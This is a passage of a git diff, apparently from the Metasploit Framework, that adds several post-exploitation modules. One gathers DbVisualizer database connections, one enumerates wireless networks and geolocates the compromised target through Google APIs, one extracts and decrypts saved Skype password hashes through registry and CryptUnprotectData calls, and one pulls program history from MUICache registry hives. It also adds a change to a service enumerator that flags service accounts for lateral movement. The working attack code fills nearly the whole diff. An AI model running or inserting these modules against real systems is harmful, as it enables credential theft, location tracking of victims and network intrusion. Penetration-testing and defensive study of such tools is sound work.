+        if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
+          db[:Alias] = $1
+        end
+
+        # get the type
+        if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
+          db[:Type] = $1
+        end
+
+        # get the user
+        if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
+          db[:Userid] = $1
+        end
+
+        # get the server
+        if (line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i)
+          db[:Server] = $1
+        end
+
+        # get the port
+        if (line =~ /<UrlVariable UrlVariableName="Port">([\S+]+)<\/UrlVariable>/i)
+          db[:Port] = $1
+        end
+
+        # get the database
+        if (line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i)
+          db[:Database] = $1
+        end
+
+        # get the Namespace
+        if (line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i)
+          db[:Namespace] = $1
+        end
+      end
+    end
+
+    # Fill the tab and report eligible servers
+    dbs.each do |db|
+      if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
+        print_good("Reporting #{db[:Server]} ")
+        report_host(:host =>  db[:Server]);
+      end
+
+      db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]]
+    end
+    return db_table
+  end
+
+
+  # New config file parse function
+  def pareseOldConfigFile(raw_xml)
+
+    db_table = Rex::Ui::Text::Table.new(
+    'Header'    => "Dbvis Databases",
+    'Indent'    => 2,
+    'Columns'   =>
+    [
+      "Alias",
+      "Type",
+      "Url",
+      "Userid",
+    ])
+
+    dbs = []
+    db = {}
+    dbfound = false
+    versionFound = false
+
+    # fetch config file
+    raw_xml.each_line do |line|
+
+      if versionFound == false
+         vesrionFound = findVersion(line)
+      end
+
+      if line =~ /<Database id=/
+        dbfound = true
+      elsif line =~ /<\/Database>/
+        dbfound = false
+        # save
+        dbs << db if (db[:Alias] and db[:Url] )
+        db = {}
+      end
+
+      if dbfound == true
+        # get the alias
+        if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
+          db[:Alias] = $1
+        end
+
+        # get the type
+        if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
+          db[:Type] = $1
+        end
+
+        # get the user
+        if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
+          db[:Userid] = $1
+        end
+
+        # get the user
+        if (line =~ /<Url>([\S+\s+]+)<\/Url>/i)
+          db[:Url] = $1
+        end
+      end
+    end
+
+    # Fill the tab
+    dbs.each do |db|
+      if (db[:Url] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)
+        if ::Rex::Socket.is_ipv4?($1.to_s)
+          print_good("Reporting #{$1}")
+          report_host(:host => $1.to_s)
+        end
+      end
+      db_table << [ db[:Alias] , db[:Type] , db[:Url], db[:Userid] ]
+    end
+    return db_table
+  end
+
+
+  def findVersion(tag)
+    found = false
+    if (tag =~ /<Version>([\S+\s+]+)<\/Version>/i)
+      print_good("DbVisualizer version :  #{$1}")
+      found = true
+    end
+    return found
+  end
+
+end
diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb
new file mode 100644
index 0000000000..15efb30639
--- /dev/null
+++ b/modules/post/multi/gather/wlan_geolocate.rb
@@ -0,0 +1,223 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'json'
+require 'net/http'
+
+class Metasploit3 < Msf::Post
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Multiplatform WLAN Enumeration and Geolocation',
+        'Description'   => %q{ Enumerate wireless networks visible to the target device.
+        Optionally geolocate the target by gathering local wireless networks and
+        performing a lookup against Google APIs.},
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Tom Sellers <tom[at]fadedcode.net>'],
+        'Platform'      => %w{ osx win linux bsd solaris },
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
+      ))
+
+      register_options(
+        [
+        OptBool.new('GEOLOCATE', [ false, 'Use Google APIs to geolocate Linux, Windows, and OS X targets.', false])
+        ], self.class)
+
+  end
+
+  def get_strength(quality)
+    # Convert the signal quality to signal strength (dbm) to be sent to
+    # Google.  Docs indicate this should subtract 100 instead of the 95 I
+    # am using here, but in practice 95 seems to be closer.
+    signal_str = quality.to_i / 2
+    signal_str = (signal_str - 95).round
+    return signal_str
+
+  end
+
+  def parse_wireless_win(listing)
+    wlan_list = ''
+    raw_networks = listing.split("\r\n\r\n")
+
+    raw_networks.each { |network|
+      details = network.match(/^SSID [\d]+ : ([^\r\n]*).*?BSSID 1[\s]+: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal[\s]+: ([\d]{1,3})%/m)
+        if !details.nil?
+          strength = get_strength(details[3])
+          network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{strength.to_i}"
+          wlan_list << network_data
+        end
+    }
+
+    return wlan_list
+  end
+
+
+  def parse_wireless_linux(listing)
+    wlan_list = ''
+    raw_networks = listing.split("Cell ")
+
+    raw_networks.each { |network|
+      details = network.match(/^[\d]{1,4} - Address: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal level=([\d-]{1,3}).*?ESSID:"([^"]*)/m)
+        if !details.nil?
+          network_data = "&wifi=mac:#{details[1].to_s.upcase}|ssid:#{details[3].to_s}|ss=#{details[2].to_i}"
+          wlan_list << network_data
+        end
+    }
+
+    return wlan_list
+  end
+
+  def parse_wireless_osx(listing)
+    wlan_list = ''
+    raw_networks = listing.split("\n")
+
+    raw_networks.each { |network|
+      network = network.strip
+      details = network.match(/^(.*(?!\h\h:))[\s]*([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2})[\s]*([\d-]{1,3})/)
+        if !details.nil?
+          network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{details[3].to_i}"
+          wlan_list << network_data
+        end
+    }
+
+    return wlan_list
+  end
+
+  def perform_geolocation(wlan_list)
+
+    if wlan_list.blank?
+      print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
+      return
+    end
+
+    # Build and send the request to Google
+    url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
+    uri = URI.parse(URI.encode(url))
+    request = Net::HTTP::Get.new(uri.request_uri)
+    http = Net::HTTP::new(uri.host,uri.port)
+    http.use_ssl = true
+    response = http.request(request)
+
+    # Gather the required information from the response
+    if response && response.code == '200'
+      results = JSON.parse(response.body)
+      latitude =  results["location"]["lat"]
+      longitude = results["location"]["lng"]
+      accuracy = results["accuracy"]
+      print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
+      print_status("Google Maps URL:  https://maps.google.com/?q=#{latitude},#{longitude}")
+    else
+      print_error("Failure connecting to Google for location lookup.")
+    end
+
+  end
+
+
+  # Run Method for when run command is issued
+  def run
+    if session.type =~ /shell/
+      # Use the shell platform for selecting the command
+      platform = session.platform
+    else
+      # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform
+      platform = session.sys.config.sysinfo['OS']
+    end
+
+
+    case platform
+    when /win/i
+
+      listing = cmd_exec('netsh wlan show networks mode=bssid')
+      if listing.nil?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        # The wireless output does not lend itself to displaying on screen for this platform.
+        print_status("Wireless list saved to loot.")
+        if datastore['GEOLOCATE']
+          wlan_list = parse_wireless_win(listing)
+          perform_geolocation(wlan_list)
+          return
+        end
+      end
+
+    when /osx/i
+
+      listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s')
+      if listing.nil?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        print_status("Target's wireless networks:\n\n#{listing}\n")
+        if datastore['GEOLOCATE']
+          wlan_list = parse_wireless_osx(listing)
+          perform_geolocation(wlan_list)
+          return
+        end
+      end
+
+    when /linux/i
+
+      listing = cmd_exec('iwlist scanning')
+      if listing.nil?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        # The wireless output does not lend itself to displaying on screen for this platform.
+        print_status("Wireless list saved to loot.")
+        if datastore['GEOLOCATE']
+          wlan_list = parse_wireless_linux(listing)
+          perform_geolocation(wlan_list)
+          return
+        end
+      end
+
+    when /solaris/i
+
+      listing = cmd_exec('dladm scan-wifi')
+      if listing.blank?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.solaris.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        print_status("Target's wireless networks:\n\n#{listing}\n")
+        print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
+        return
+      end
+
+    when /bsd/i
+
+      interface = cmd_exec("dmesg | grep -i wlan | cut -d ':' -f1 | uniq")
+      # Printing interface as this platform requires the interface to be specified
+      # it might not be detected correctly.
+      print_status("Found wireless interface: #{interface}")
+      listing = cmd_exec("ifconfig #{interface} scan")
+      if listing.blank?
+        print_error("Unable to generate wireless listing.")
+        return nil
+      else
+        store_loot("host.bsd.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+        print_status("Target's wireless networks:\n\n#{listing}\n")
+        print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
+        return
+      end
+
+    else
+      print_error("The target's platform, #{platform}, is not supported at this time.")
+      return nil
+    end
+
+    rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError
+    rescue ::Exception => e
+      print_status("The following Error was encountered: #{e.class} #{e}")
+    end
+
+
+end
diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb
index 3d7c7bee17..4b70cdc8e8 100644
--- a/modules/post/multi/manage/record_mic.rb
+++ b/modules/post/multi/manage/record_mic.rb
@@ -81,4 +81,4 @@ class Metasploit3 < Msf::Post
     end
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/post/windows/gather/credentials/skype.rb b/modules/post/windows/gather/credentials/skype.rb
new file mode 100644
index 0000000000..bd14ca2b88
--- /dev/null
+++ b/modules/post/windows/gather/credentials/skype.rb
@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::Registry
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Windows Gather Skype Saved Password Hash Extraction',
+      'Description'   => %q{ This module finds saved login credentials
+            for the Windows Skype client. The hash is in MD5 format
+            that uses the username, a static string "\nskyper\n" and the
+            password. The resulting MD5 is stored in the Config.xml file
+            for the user after being XOR'd against a key generated by applying
+            2 SHA1 hashes of "salt" data which is stored in ProtectedStorage
+            using the Windows API CryptProtectData against the MD5 },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+                          'mubix', # module
+                          'hdm' # crypto help
+                        ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'References'    => [
+        ['URL', 'http://www.recon.cx/en/f/vskype-part2.pdf'],
+        ['URL', 'http://insecurety.net/?p=427'],
+        ['URL', 'https://github.com/skypeopensource/tools']
+      ]
+    ))
+  end
+
+# To generate test hashes in ruby use:
+=begin
+
+require 'openssl'
+
+username = "test"
+passsword = "test"
+
+hash = Digest::MD5.new
+hash.update username
+hash.update "\nskyper\n"
+hash.update password
+
+puts hash.hexdigest
+
+=end
+
+  def decrypt_reg(data)
+    rg = session.railgun
+    pid = session.sys.process.getpid
+    process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
+    mem = process.memory.allocate(512)
+    process.memory.write(mem, data)
+
+    if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
+        addr = [mem].pack("V")
+        len = [data.length].pack("V")
+        ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
+        len, addr = ret["pDataOut"].unpack("V2")
+    else
+        # Convert using rex, basically doing: [mem & 0xffffffff, mem >> 32].pack("VV")
+        addr = Rex::Text.pack_int64le(mem)
+        len = Rex::Text.pack_int64le(data.length)
+        ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
+        pData = ret["pDataOut"].unpack("VVVV")
+        len = pData[0] + (pData[1] << 32)
+        addr = pData[2] + (pData[3] << 32)
+    end
+
+    return "" if len == 0
+    return process.memory.read(addr, len)
+  end
+
+  # Get the "Salt" unencrypted from the registry
+  def get_salt
+    print_status "Checking for encrypted salt in the registry"
+    vprint_status "Checking: HKCU\\Software\\Skype\\ProtectedStorage - 0"
+    rdata = registry_getvaldata('HKCU\\Software\\Skype\\ProtectedStorage', '0')
+    print_good("Salt found and decrypted")
+    return decrypt_reg(rdata)
+  end
+
+  # Pull out all the users in the AppData directory that have config files
+  def get_config_users(appdatapath)
+    users = []
+    dirlist = session.fs.dir.entries(appdatapath)
+    dirlist.shift(2)
+    dirlist.each do |dir|
+      if file?(appdatapath + "\\#{dir}" + '\\config.xml') == false
+        vprint_error "Config.xml not found in #{appdatapath}\\#{dir}\\"
+        next
+      end
+      print_good "Found Config.xml in #{appdatapath}\\#{dir}\\"
+      users << dir
+    end
+    return users
+  end
+
+  def parse_config_file(config_path)
+    hex = ""
+    configfile = read_file(config_path)
+    configfile.each_line do |line|
+      if line =~ /Credentials/i
+        hex = line.split('>')[1].split('<')[0]
+      end
+    end
+    return hex
+  end
+
+
+
+  def decrypt_blob(credhex, salt)
+
+    # Convert Config.xml hex to binary format
+    blob = [credhex].pack("H*")
+
+    # Concatinate SHA digests for AES key
+    sha = Digest::SHA1.digest("\x00\x00\x00\x00" + salt) + Digest::SHA1.digest("\x00\x00\x00\x01" + salt)
+
+    aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
+    aes.encrypt
+    aes.key = sha[0,32] # Use only 32 bytes of key
+    final = aes.update([0].pack("N*") * 4) # Encrypt 16 \x00 bytes
+    final << aes.final
+    xor_key = final[0,16]  # Get only the first 16 bytes of result
+
+    vprint_status("XOR Key: #{xor_key.unpack("H*")[0]}")
+
+    decrypted = []
+
+    # Use AES/SHA crypto for XOR decoding
+    (0...16).each do |i|
+      decrypted << (blob[i].unpack("C*")[0] ^ xor_key[i].unpack("C*")[0])
+    end
+
+    return decrypted.pack("C*").unpack("H*")[0]
+  end
+
+
+  def get_config_creds(salt)
+    users = []
+    appdatapath = expand_path("%AppData%") + "\\Skype"
+    print_status ("Checking for config files in %APPDATA%")
+    users = get_config_users(appdatapath)
+    if users.any?
+      users.each do |user|
+        print_status("Parsing #{appdatapath}\\#{user}\\Config.xml")
+        credhex = parse_config_file("#{appdatapath}\\#{user}\\config.xml")
+        if credhex == ""
+          print_error("No Credentials3 blob found for #{user} in Config.xml skipping")
+          next
+        else
+          hash = decrypt_blob(credhex, salt)
+          print_good "Skype MD5 found: #{user}:#{hash}"
+        end
+      end
+    else
+      print_error "No users with configs found. Exiting"
+    end
+  end
+
+  def run
+    salt = get_salt
+    if salt != nil
+      creds = get_config_creds(salt)
+    else
+      print_error "No salt found. Cannot continue without salt, exiting"
+    end
+  end
+
+end
+
diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb
new file mode 100644
index 0000000000..6b25a3dab2
--- /dev/null
+++ b/modules/post/windows/gather/enum_muicache.rb
@@ -0,0 +1,262 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+require 'msf/core'
+require 'rex/registry'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Registry
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        =>'Windows Gather Enum User MUICache',
+      'Description' =>
+      %q{
+        This module gathers information about the files and file paths that logged on users have
+        executed on the system. It also will check if the file still exists on the system. This
+        information is gathered by using information stored under the MUICache registry key. If
+        the user is logged in when the module is executed it will collect the MUICache entries
+        by accessing the registry directly. If the user is not logged in the module will download
+        users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are
+        parsed from the downloaded hive.
+      },
+      'License'     =>  MSF_LICENSE,
+      'Author'      =>  ['TJ Glad <tjglad[at]cmail.nu>'],
+      'Platform'    =>  ['win'],
+      'SessionType' =>  ['meterpreter']
+    ))
+  end
+
+  # Scrapes usernames, sids and homepaths from the registry so that we'll know
+  # what user accounts are on the system and where we can find those users
+  # registry hives.
+  def find_user_names
+    user_names = []
+    user_homedir_paths = []
+    user_sids = []
+
+    username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList"
+    profile_subkeys = registry_enumkeys(username_reg_path)
+    if profile_subkeys.blank?
+      print_error("Unable to access ProfileList registry key. Unable to continue.")
+      return nil
+    end
+
+    profile_subkeys.each do |user_sid|
+      unless user_sid.length > 10
+        next
+      end
+      user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath")
+      if user_home_path.blank?
+        print_error("Unable to read ProfileImagePath from the registry. Unable to continue.")
+        return nil
+      end
+      full_path = user_home_path.strip
+      user_names << full_path.split("\\").last
+      user_homedir_paths << full_path
+      user_sids << user_sid
+    end
+
+    return user_names, user_homedir_paths, user_sids
+  end
+
+  # This function builds full registry muicache paths so that we can
+  # later enumerate the muicahe registry key contents.
+  def enum_muicache_paths(sys_sids, mui_path)
+    user_mui_paths = []
+    hive = "HKU\\"
+
+    sys_sids.each do |sid|
+      full_path = hive + sid + mui_path
+      user_mui_paths << full_path
+    end
+
+    user_mui_paths
+  end
+
+  # This is the main enumeration function that calls other main
+  # functions depending if we can access the registry directly or if
+  # we need to download the hive and process it locally.
+  def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
+    results = []
+
+    all_user_entries = sys_users.zip(muicache_reg_keys, sys_paths)
+
+    all_user_entries.each do |user, reg_key, sys_path|
+
+      subkeys = registry_enumvals(reg_key)
+      if subkeys.blank?
+        # If the registry_enumvals returns us nothing then we'll know
+        # that the user is most likely not logged in and we'll need to
+        # download and process users hive locally.
+        print_warning("User #{user}: Can't access registry. Maybe the user is not logged in? Trying NTUSER.DAT/USRCLASS.DAT...")
+        result = process_hive(sys_path, user, muicache, hive_file)
+        unless result.nil?
+          result.each { |r|
+            results << r unless r.nil?
+          }
+        end
+      else
+        # If the registry_enumvals returns us content we'll know that we
+        # can access the registry directly and thus continue to process
+        # the content collected from there.
+        print_status("User #{user}: Enumerating registry...")
+        subkeys.each do |key|
+          if key[0] != "@" && key != "LangID" && !key.nil?
+            result = check_file_exists(key, user)
+            results << result unless result.nil?
+          end
+        end
+      end
+    end
+
+    results
+  end
+
+  # This function will check if it can find the program executable
+  # from the path it found from the registry. Permissions might affect
+  # if it detects the executable but it should be otherwise fairly
+  # reliable.
+  def check_file_exists(key, user)
+    program_path = expand_path(key)
+    if file_exist?(key)
+      return [user, program_path, "File found"]
+    else
+      return [user, program_path, "File not found"]
+    end
+  end
+
+  # This function will check if the filepath contains a registry hive
+  # and if it does it'll proceed to call the function responsible of
+  # downloading the hive. After successfull download it'll continue to
+  # call the hive_parser function which will extract the contents of
+  # the MUICache registry key.
+  def process_hive(sys_path, user, muicache, hive_file)
+    user_home_path = expand_path(sys_path)
+    hive_path = user_home_path + hive_file
+    ntuser_status = file_exist?(hive_path)
+
+    unless ntuser_status == true
+      print_warning("Couldn't locate/download #{user}'s registry hive. Unable to proceed.")
+      return nil
+    end
+
+    print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file...")
+    local_hive_copy = Rex::Quickfile.new("jtrtmp")
+    local_hive_copy.close
+    begin
+      session.fs.file.download_file(local_hive_copy.path, hive_path)
+    rescue ::Rex::Post::Meterpreter::RequestError
+      print_error("Unable to download NTUSER.DAT/USRCLASS.DAT file")
+      local_hive_copy.unlink rescue nil
+      return nil
+    end
+    results = hive_parser(local_hive_copy.path, muicache, user)
+    local_hive_copy.unlink rescue nil # Windows often complains about unlinking tempfiles
+
+    results
+  end
+
+  # This function is responsible for parsing the downloaded hive and
+  # extracting the contents of the MUICache registry key.
+  def hive_parser(local_hive_copy, muicache, user)
+    results = []
+    print_status("Parsing registry content...")
+    err_msg = "Error parsing hive. Unable to continue."
+    hive = Rex::Registry::Hive.new(local_hive_copy)
+    if hive.nil?
+      print_error(err_msg)
+      return nil
+    end
+
+    muicache_key = hive.relative_query(muicache)
+    if muicache_key.nil?
+      print_error(err_msg)
+      return nil
+    end
+
+    muicache_key_value_list = muicache_key.value_list
+    if muicache_key_value_list.nil?
+      print_error(err_msg)
+      return nil
+    end
+
+    muicache_key_values = muicache_key_value_list.values
+    if muicache_key_values.nil?
+      print_error(err_msg)
+      return nil
+    end
+
+    muicache_key_values.each do |value|
+      key = value.name
+      if key[0] != "@" && key != "LangID" && !key.nil?
+        result = check_file_exists(key, user)
+        results << result unless result.nil?
+      end
+    end
+
+    results
+  end
+
+  # Information about the MUICache registry key was collected from:
+  #
+  # - Windows Forensic Analysis Toolkit / 2012 / Harlan Carvey
+  # - Windows Registry Forensics / 2011 / Harlan Carvey
+  # - http://forensicartifacts.com/2010/08/registry-muicache/
+  # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots
+  def run
+    print_status("Starting to enumerate MUICache registry keys...")
+    sys_info = sysinfo['OS']
+
+    if sys_info =~/Windows XP/ && is_admin?
+      print_good("Remote system supported: #{sys_info}")
+      muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache"
+      hive_file = "\\NTUSER.DAT"
+    elsif sys_info =~/Windows 7/ && is_admin?
+      print_good("Remote system supported: #{sys_info}")
+      muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MUICache"
+      hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat"
+    else
+      print_error("Unsupported OS or not enough privileges. Unable to continue.")
+      return nil
+    end
+
+    table = Rex::Ui::Text::Table.new(
+      'Header'  =>  'MUICache Information',
+      'Indent'  =>  1,
+      'Columns' =>
+      [
+        "Username",
+        "File path",
+        "File status",
+      ])
+
+    print_status("Phase 1: Searching user names...")
+    sys_users, sys_paths, sys_sids = find_user_names
+
+    if sys_users.blank?
+      print_error("Was not able to find any user accounts. Unable to continue.")
+      return nil
+    else
+      print_good("Users found: #{sys_users.join(", ")}")
+    end
+
+    print_status("Phase 2: Searching registry hives...")
+    muicache_reg_keys = enum_muicache_paths(sys_sids, muicache)
+    results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
+
+    results.each { |r| table << r }
+
+    print_status("Phase 3: Processing results...")
+    loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information")
+    print_line("\n" + table.to_s + "\n")
+    print_status("Results stored as: #{loot}")
+    print_status("Execution finished.")
+  end
+
+end
diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb
index 8f75d3686f..baf89b0efe 100644
--- a/modules/post/windows/gather/enum_services.rb
+++ b/modules/post/windows/gather/enum_services.rb
@@ -16,8 +16,8 @@ class Metasploit3 < Msf::Post
       'Name'                 => "Windows Gather Service Info Enumeration",
       'Description'          => %q{
         This module will query the system for services and display name and configuration
-        info for each returned service. It allows you to optionally search the credentials, path, or start
-        type for a string and only return the results that match. These query operations
+        info for each returned service. It allows you to optionally search the credentials, path,
+        or start type for a string and only return the results that match. These query operations
         are cumulative and if no query strings are specified, it just returns all services.
         NOTE: If the script hangs, windows firewall is most likely on and you did not
         migrate to a safe process (explorer.exe for example).
@@ -36,9 +36,12 @@ class Metasploit3 < Msf::Post
   end
 
 
+
   def run
 
     # set vars
+    lootString = ""
+    credentialCount = {}
     qcred = datastore["CRED"] || nil
     qpath = datastore["PATH"] || nil
     if datastore["TYPE"] == "All"
@@ -47,24 +50,29 @@ class Metasploit3 < Msf::Post
       qtype = datastore["TYPE"]
     end
     if qcred
-      print_status("Credential Filter: " + qcred)
+      print_status("Credential Filter: #{qcred}")
     end
     if qpath
-      print_status("Executable Path Filter: " + qpath)
+      print_status("Executable Path Filter: #{qpath}")
     end
     if qtype
-      print_status("Start Type Filter: " + qtype)
+      print_status("Start Type Filter: #{qtype}")
+    end
+
+    if datastore['VERBOSE']
+      print_status("Listing Service Info for matching services:")
+    else
+      print_status("Detailed output is only printed when VERBOSE is set to True. Running this module can take some time.\n")
     end
 
-    print_status("Listing Service Info for matching services:")
     service_list.each do |sname|
       srv_conf = {}
       isgood = true
-      #make sure we got a service name
+      # make sure we got a service name
       if sname
         begin
           srv_conf = service_info(sname)
-          #filter service based on filters passed, the are cumulative
+          # filter service based on filters passed, the are cumulative
           if qcred and ! srv_conf['Credentials'].downcase.include? qcred.downcase
             isgood = false
           end
@@ -75,22 +83,45 @@ class Metasploit3 < Msf::Post
           if qtype and ! (srv_conf['Startup'] || '').downcase.include? qtype.downcase
             isgood = false
           end
-
-          #if we are still good return the info
-          if isgood
-            vprint_status("\tName: #{sname}")
-            vprint_good("\t\tStartup: #{srv_conf['Startup']}")
-            vprint_good("\t\tCommand: #{srv_conf['Command']}")
-            vprint_good("\t\tCredentials: #{srv_conf['Credentials']}")
+          # count the occurance of specific credentials services are running as
+          serviceCred = srv_conf['Credentials'].upcase
+          unless serviceCred.empty?
+            if credentialCount.has_key?(serviceCred)
+              credentialCount[serviceCred] += 1
+            else
+              credentialCount[serviceCred] = 1
+              # let the user know a new service account has been detected for possible lateral
+              # movement opportunities
+              print_good("New service credential detected: #{sname} is running as '#{srv_conf['Credentials']}'")
+            end
           end
-        rescue
+
+          # if we are still good return the info
+          if isgood
+            msgString = "\tName: #{sname}"
+            msgString << "\n\t\tStartup: #{srv_conf['Startup']}"
+            #remove invalid char at the end
+            commandString = srv_conf['Command']
+            commandString.gsub!(/[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]+/n,"")
+            msgString << "\n\t\t#{commandString}"
+            msgString << "\n\t\tCredentials: #{srv_conf['Credentials']}\n"
+            vprint_good(msgString)
+            lootString << msgString
+          end
+        rescue ::Exception => e
+          # July 3rd 2014 wchen-r7: Not very sure what exceptions this method is trying to rescue,
+          # probably the typical shut-everything-up coding habit. We'll have to fix this later,
+          # but for now let's at least print the error for debugging purposes
           print_error("An error occured enumerating service: #{sname}")
+          print_error(e.to_s)
         end
       else
-        print_error("Problem enumerating services")
+        print_error("Problem enumerating services (no service name found)")
       end
-
     end
+      # store loot on completion of collection
+      p = store_loot("windows.services", "text/plain", session, lootString, "windows_services.txt", "Windows Services")
+      print_good("Loot file stored in: #{p.to_s}")
   end
 
 end
diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb
index dd1309f664..8be4457703 100644
--- a/modules/post/windows/gather/local_admin_search_enum.rb
+++ b/modules/post/windows/gather/local_admin_search_enum.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Post
           'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
           'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
         ],
-      'Platform'     => [ 'windows'],
+      'Platform'     => 'win',
       'SessionTypes' => [ 'meterpreter' ]
       ))
 
diff --git a/modules/post/windows/gather/lsa_secrets.rb b/modules/post/windows/gather/lsa_secrets.rb
index af1252d1e3..7f7baec633 100644
--- a/modules/post/windows/gather/lsa_secrets.rb
+++ b/modules/post/windows/gather/lsa_secrets.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
       'License'         => MSF_LICENSE,
       'Platform'        => ['win'],
       'SessionTypes'    => ['meterpreter'],
-      'Author'          => ['Rob Bathurst <rob.bathurst@foundstone.com>']
+      'Author'          => ['Rob Bathurst <rob.bathurst[at]foundstone.com>']
     ))
   end
 
diff --git a/modules/post/windows/gather/netlm_downgrade.rb b/modules/post/windows/gather/netlm_downgrade.rb
index c1240cc7fe..3e0e6378f8 100644
--- a/modules/post/windows/gather/netlm_downgrade.rb
+++ b/modules/post/windows/gather/netlm_downgrade.rb
@@ -23,8 +23,8 @@ class Metasploit3 < Msf::Post
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Brandon McCann "zeknox" <bmccann [at] accuvant.com>',
-          'Thomas McCarthy "smilingraccoon" <smilingraccoon [at] gmail.com>'
+          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>',
+          'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>'
         ],
       'SessionTypes'   => [ 'meterpreter' ],
       'References'     =>
diff --git a/modules/post/windows/manage/driver_loader.rb b/modules/post/windows/manage/driver_loader.rb
index 7f32ab25fc..5ee2b50215 100644
--- a/modules/post/windows/manage/driver_loader.rb
+++ b/modules/post/windows/manage/driver_loader.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Post
       },
       'License'       => MSF_LICENSE,
       'Author'        => 'Borja Merino <bmerinofe[at]gmail.com>',
-      'Platform'      => 'windows',
+      'Platform'      => 'win',
       'SessionTypes'  => [ 'meterpreter' ]
     ))
 
